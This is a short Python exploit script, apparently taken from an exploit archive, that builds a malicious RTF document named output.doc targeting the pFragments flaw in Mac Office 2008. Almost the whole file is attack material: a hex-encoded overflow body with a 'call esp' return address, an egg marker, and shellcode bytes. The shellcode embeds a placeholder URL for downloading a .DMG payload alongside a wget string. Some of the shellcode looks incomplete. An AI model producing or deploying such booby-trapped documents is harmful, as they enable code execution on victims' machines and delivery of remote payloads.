#RTF Pfragments exploit for MAC office 2008 #Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com #Advanced Hacking Trainings - http://training.aslitsecurity.com/ #Web - http://www.aslitsecurity.com/ #Blog - http://www.aslitsecurity.blogspot.com/ #Office 2007 for MC SP 0 #!/usr/bin/python myfile = ( "\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7b" "\x5c\x73\x6e\x20\x70\x46\x72\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b" "\x5c\x73\x76\x20\x39\x3b\x32\x3b\x31\x31\x31\x31\x31\x31\x31\x31" "\x37\x35\x30\x30\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "f069837c" # call esp "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" "\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x62\x61\x30\x30" "\x30\x30\x35\x30\x30\x30\x36\x36\x38\x31\x63\x61\x66\x66\x30\x66" "\x34\x32\x35\x32\x36\x61\x30\x32\x35\x38\x63\x64\x32\x65\x33\x63" "\x30\x35\x35\x61\x37\x34\x65\x66\x62\x38\x37\x30\x36\x39\x36\x65" "\x36\x37\x38\x62\x66\x61\x61\x66\x37\x35\x65\x61\x61\x66\x37\x35" "\x65\x37\x35\x37\x63\x33\x7d\x7d\x7d\x7d" ) sign = ( "\x70\x69\x6e\x67\x70\x69\x6e\x67" ) shellcode = "\xCC\xCC\xCC\xCC" shellcode += "http://www.site.com/payload.DMG" shellcode += "\x11\x3A\x65\x89\x11\x3A\x65\x89\x11\x3A\x65\x89" #("wget http://") shellcode += "wget " shellcode += "\x1A\x18\x19\x02" exploit = open("output.doc", mode="wb") exploit.write(myfile + sign + shellcode) print "Done"